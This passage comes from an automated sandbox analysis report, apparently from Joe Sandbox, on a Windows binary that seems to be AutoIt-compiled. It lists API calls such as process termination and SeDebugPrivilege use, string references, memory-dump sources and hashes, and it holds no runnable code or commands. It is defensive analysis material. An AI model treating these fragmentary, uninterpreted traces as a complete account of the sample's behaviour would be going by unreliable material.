                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1957940570-0
                                                                                                                                                                                                                                                                  • Opcode ID: da47bb0038d11c7236488e39faede95218d22c6bc80c9e61228624b17ee43fce
                                                                                                                                                                                                                                                                  • Instruction ID: 89002ae4a9c777ea6292b3e9ad83e2bb9564c638c300d843a2d8e8ea9502bf41
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: da47bb0038d11c7236488e39faede95218d22c6bc80c9e61228624b17ee43fce
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7C01A8B5240304BFE610ABA5DC49F6B7BADEB88711F404411FA09DB2A1DA709844CA30
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 00D4DD87: CreateToolhelp32Snapshot.KERNEL32 ref: 00D4DDAC
                                                                                                                                                                                                                                                                    • Part of subcall function 00D4DD87: Process32FirstW.KERNEL32(00000000,?), ref: 00D4DDBA
                                                                                                                                                                                                                                                                    • Part of subcall function 00D4DD87: CloseHandle.KERNEL32(00000000), ref: 00D4DE87
                                                                                                                                                                                                                                                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00D6ABCA
                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00D6ABDD
                                                                                                                                                                                                                                                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00D6AC10
                                                                                                                                                                                                                                                                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 00D6ACC5
                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(00000000), ref: 00D6ACD0
                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00D6AD21
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                                                                                                                                                                                                  • String ID: SeDebugPrivilege
                                                                                                                                                                                                                                                                  • API String ID: 2533919879-2896544425
                                                                                                                                                                                                                                                                  • Opcode ID: d192d36b2d6ec17f833693b105cf8af61b946874f65038d107bac5ca98e051ea
                                                                                                                                                                                                                                                                  • Instruction ID: bfa7d05bd31729cee03680be0b11cdfcc36174001447c6e8221d28917c46dd42
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d192d36b2d6ec17f833693b105cf8af61b946874f65038d107bac5ca98e051ea
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1D61AD742042419FD710DF19C495F25BBE1AF54308F19849CE4AA9BBA3D771EC85CFA2
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00D743C1
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 00D743D6
                                                                                                                                                                                                                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00D743F0
                                                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00D74435
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00001057,00000000,?), ref: 00D74462
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00D74490
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: MessageSend$Window_wcslen
                                                                                                                                                                                                                                                                  • String ID: SysListView32
                                                                                                                                                                                                                                                                  • API String ID: 2147712094-78025650
                                                                                                                                                                                                                                                                  • Opcode ID: 6baee746b23732f6000dbdf1133a3b4454374ad5c16538bbfb2279f1301a46f7
                                                                                                                                                                                                                                                                  • Instruction ID: 3a807c9f136701205215e67306e8b15e3b8e95fc7ab75521075e9f819d13b88b
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6baee746b23732f6000dbdf1133a3b4454374ad5c16538bbfb2279f1301a46f7
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E241D271940319ABDF229F64CC49BEA7BA9FF08350F144526F94CE7291E7719980DBB0
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00D4C6C4
                                                                                                                                                                                                                                                                  • IsMenu.USER32(00000000), ref: 00D4C6E4
                                                                                                                                                                                                                                                                  • CreatePopupMenu.USER32 ref: 00D4C71A
                                                                                                                                                                                                                                                                  • GetMenuItemCount.USER32(01736BD0), ref: 00D4C76B
                                                                                                                                                                                                                                                                  • InsertMenuItemW.USER32(01736BD0,?,00000001,00000030), ref: 00D4C793
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                                                                                                                                                                                                                                  • String ID: 0$2
                                                                                                                                                                                                                                                                  • API String ID: 93392585-3793063076
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • LoadIconW.USER32(00000000,00007F03), ref: 00D4D1BE
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
• Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: IconLoad
                                                                                                                                                                                                                                                                  • String ID: blank$info$question$stop$warning
                                                                                                                                                                                                                                                                  • API String ID: 2457776203-404129466
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                                                                                                                                                                                                                                                                  • String ID: 0.0.0.0
                                                                                                                                                                                                                                                                  • API String ID: 642191829-3771769585
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: _wcslen$LocalTime
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 952045576-0
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00D239E2,00000004,00000000,00000000), ref: 00CFFC41
                                                                                                                                                                                                                                                                  • ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,00D239E2,00000004,00000000,00000000), ref: 00D3FC15
                                                                                                                                                                                                                                                                  • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00D239E2,00000004,00000000,00000000), ref: 00D3FC98
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ShowWindow
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1268545403-0
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 00D737B7
                                                                                                                                                                                                                                                                  • GetDC.USER32(00000000), ref: 00D737BF
                                                                                                                                                                                                                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00D737CA
                                                                                                                                                                                                                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 00D737D6
                                                                                                                                                                                                                                                                  • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00D73812
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00D73823
                                                                                                                                                                                                                                                                  • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00D76504,?,?,000000FF,00000000,?,000000FF,?), ref: 00D7385E
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00D7387D
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3864802216-0
                                                                                                                                                                                                                                                                  • Opcode ID: 5122a16d56307b8d0b04b61ea1a18070c97cec14b703febcd78f5ee5ac2cbe74
                                                                                                                                                                                                                                                                  • Instruction ID: c1057ce645c5e295d3518a0f119020293116b3a4e7925fc02c5ac887ad685a4c
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5122a16d56307b8d0b04b61ea1a18070c97cec14b703febcd78f5ee5ac2cbe74
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C3317C72201214ABEB154F50CC89FEB3BAAEF49711F044065FE0DDA291E6B59881C7B0
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: NULL Pointer assignment$Not an Object type
                                                                                                                                                                                                                                                                  • API String ID: 0-572801152
                                                                                                                                                                                                                                                                  • Opcode ID: 24e9f0c97745c4c900e1b86ce45ddedfdc961e64b32315dce750e0bd65c2864f
                                                                                                                                                                                                                                                                  • Instruction ID: e3443b758c3484433fd4ed4092a9d458cce07a8039806abbfbe54f19bbae8307
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 24e9f0c97745c4c900e1b86ce45ddedfdc961e64b32315dce750e0bd65c2864f
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B1D19071A0060A9FDF10CF68D885BAEB7B5FF48314F188169E915AB285E770ED85CB70
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,00D21B7B,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 00D2194E
                                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00D21B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00D219D1
                                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00D21B7B,?,00D21B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00D21A64
                                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00D21B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00D21A7B
                                                                                                                                                                                                                                                                    • Part of subcall function 00D13B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00D06A79,?,0000015D,?,?,?,?,00D085B0,000000FF,00000000,?,?), ref: 00D13BC5
                                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,00D21B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00D21AF7
                                                                                                                                                                                                                                                                  • __freea.LIBCMT ref: 00D21B22
                                                                                                                                                                                                                                                                  • __freea.LIBCMT ref: 00D21B2E
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2829977744-0
                                                                                                                                                                                                                                                                  • Opcode ID: 1ee616d2f9fa68290f826a4bcb8f8a797b35c3ddc1a049eb9c2ef14c6a952f2b
                                                                                                                                                                                                                                                                  • Instruction ID: 30f71e113f20ac912adbd0abf76da6763e92882d6a99578795435ac983f01f0d
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1ee616d2f9fa68290f826a4bcb8f8a797b35c3ddc1a049eb9c2ef14c6a952f2b
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8E91D875E002366EDB208F64E891AEE7BB5EF39318F188169E855E7140E735DD80CB70
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Variant$ClearInit
                                                                                                                                                                                                                                                                  • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                                                                                                                                                                                                  • API String ID: 2610073882-625585964
                                                                                                                                                                                                                                                                  • Opcode ID: 8ab241be4c86136606f4909315bd83db2e50c8fc75e3ec653952bd6e1284a838
                                                                                                                                                                                                                                                                  • Instruction ID: 81feed2b1959d5ff45f56e2c17ebb667cba715db8b6903c887dd08b8f5f1a18f
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8ab241be4c86136606f4909315bd83db2e50c8fc75e3ec653952bd6e1284a838
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 58919C71A00719ABCF20CFA5DC48FAEBBB8EF46314F148559F905AB284D7749985CBB0
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 00D51C1B
                                                                                                                                                                                                                                                                  • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00D51C43
                                                                                                                                                                                                                                                                  • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 00D51C67
                                                                                                                                                                                                                                                                  • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00D51C97
                                                                                                                                                                                                                                                                  • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00D51D1E
                                                                                                                                                                                                                                                                  • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00D51D83
                                                                                                                                                                                                                                                                  • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00D51DEF
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ArraySafe$Data$Access$UnaccessVartype
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2550207440-0
                                                                                                                                                                                                                                                                  • Opcode ID: 0e5c3e52afc49075de3d857021d99aeb70f47cb5ea9e9790a1b659632aaa535a
                                                                                                                                                                                                                                                                  • Instruction ID: 20050113f1405261929162d91389442ea26d58a553f2f26592084d6e9cdb5dc6
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0e5c3e52afc49075de3d857021d99aeb70f47cb5ea9e9790a1b659632aaa535a
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4891AA79A00219AFDF009F98C885BBEB7B4EF04716F14402AED55EB291E775A948CB70
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • VariantInit.OLEAUT32(?), ref: 00D643C8
                                                                                                                                                                                                                                                                  • CharUpperBuffW.USER32(?,?), ref: 00D644D7
                                                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00D644E7
                                                                                                                                                                                                                                                                  • VariantClear.OLEAUT32(?), ref: 00D6467C
                                                                                                                                                                                                                                                                    • Part of subcall function 00D5169E: VariantInit.OLEAUT32(00000000), ref: 00D516DE
                                                                                                                                                                                                                                                                    • Part of subcall function 00D5169E: VariantCopy.OLEAUT32(?,?), ref: 00D516E7
                                                                                                                                                                                                                                                                    • Part of subcall function 00D5169E: VariantClear.OLEAUT32(?), ref: 00D516F3
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                                                                                                                                                                                                                                                                  • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                                                                                                                                                                                                  • API String ID: 4137639002-1221869570
                                                                                                                                                                                                                                                                  • Opcode ID: a7608aef31c612d3a69bedabfdb5bcdaf94ebb5ead8a52fcf2a1924c531d3dda
                                                                                                                                                                                                                                                                  • Instruction ID: 53ed158c8150cba1c22a195ad1e5850278ae725bd67a99e1571c707ee1a18f75
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a7608aef31c612d3a69bedabfdb5bcdaf94ebb5ead8a52fcf2a1924c531d3dda
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 08915874A083419FC700EF24C48196AB7E5FF89714F14892DF88A9B351DB71ED4ACBA2
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 00D408FE: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00D40831,80070057,?,?,?,00D40C4E), ref: 00D4091B
                                                                                                                                                                                                                                                                    • Part of subcall function 00D408FE: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00D40831,80070057,?,?), ref: 00D40936
                                                                                                                                                                                                                                                                    • Part of subcall function 00D408FE: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00D40831,80070057,?,?), ref: 00D40944
                                                                                                                                                                                                                                                                    • Part of subcall function 00D408FE: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00D40831,80070057,?), ref: 00D40954
                                                                                                                                                                                                                                                                  • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 00D656AE
                                                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00D657B6
                                                                                                                                                                                                                                                                  • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00D6582C
                                                                                                                                                                                                                                                                  • CoTaskMemFree.OLE32(?), ref: 00D65837
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
                                                                                                                                                                                                                                                                  • String ID: NULL Pointer assignment
                                                                                                                                                                                                                                                                  • API String ID: 614568839-2785691316
                                                                                                                                                                                                                                                                  • Opcode ID: b568ee10679b1a33a56fb336343cdff5c9cca1a24cea1d1d582f1d5056524d20
                                                                                                                                                                                                                                                                  • Instruction ID: b983dc0b0ea603caf036e0cf7cd557adb226b1b9e14714c3aad01a75e95e268d
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b568ee10679b1a33a56fb336343cdff5c9cca1a24cea1d1d582f1d5056524d20
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F5910471D00259AFDF11DFA4D880AEEBBB9AF08304F104169E919A7255EB719E84DFB0
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetMenu.USER32(?), ref: 00D72C1F
                                                                                                                                                                                                                                                                  • GetMenuItemCount.USER32(00000000), ref: 00D72C51
                                                                                                                                                                                                                                                                  • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00D72C79
                                                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00D72CAF
                                                                                                                                                                                                                                                                  • GetMenuItemID.USER32(?,?), ref: 00D72CE9
                                                                                                                                                                                                                                                                  • GetSubMenu.USER32(?,?), ref: 00D72CF7
                                                                                                                                                                                                                                                                    • Part of subcall function 00D44393: GetWindowThreadProcessId.USER32(?,00000000), ref: 00D443AD
                                                                                                                                                                                                                                                                    • Part of subcall function 00D44393: GetCurrentThreadId.KERNEL32 ref: 00D443B4
                                                                                                                                                                                                                                                                    • Part of subcall function 00D44393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00D42F00), ref: 00D443BB
                                                                                                                                                                                                                                                                  • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00D72D7F
                                                                                                                                                                                                                                                                    • Part of subcall function 00D4F292: Sleep.KERNEL32 ref: 00D4F30A
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 4196846111-0
                                                                                                                                                                                                                                                                  • Opcode ID: b4bcd3e09c3663bfd798cec5b9db2e4e770851f5cc053f240d9019f5f468e610
                                                                                                                                                                                                                                                                  • Instruction ID: f73f44dfb80950e4879f97151bf3d3851fcf87ee623508c8a40dcef3a170ebed
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b4bcd3e09c3663bfd798cec5b9db2e4e770851f5cc053f240d9019f5f468e610
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B171AD75A00245AFCB11DF65C885ABEBBF5EF48310F148459E85AEB351EB34EE418BA0
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • IsWindow.USER32(00000000), ref: 00D78992
                                                                                                                                                                                                                                                                  • IsWindowEnabled.USER32(00000000), ref: 00D7899E
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 00D78A79
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,000000B0,?,?), ref: 00D78AAC
                                                                                                                                                                                                                                                                  • IsDlgButtonChecked.USER32(?,00000000), ref: 00D78AE4
                                                                                                                                                                                                                                                                  • GetWindowLongW.USER32(00000000,000000EC), ref: 00D78B06
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00D78B1E
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
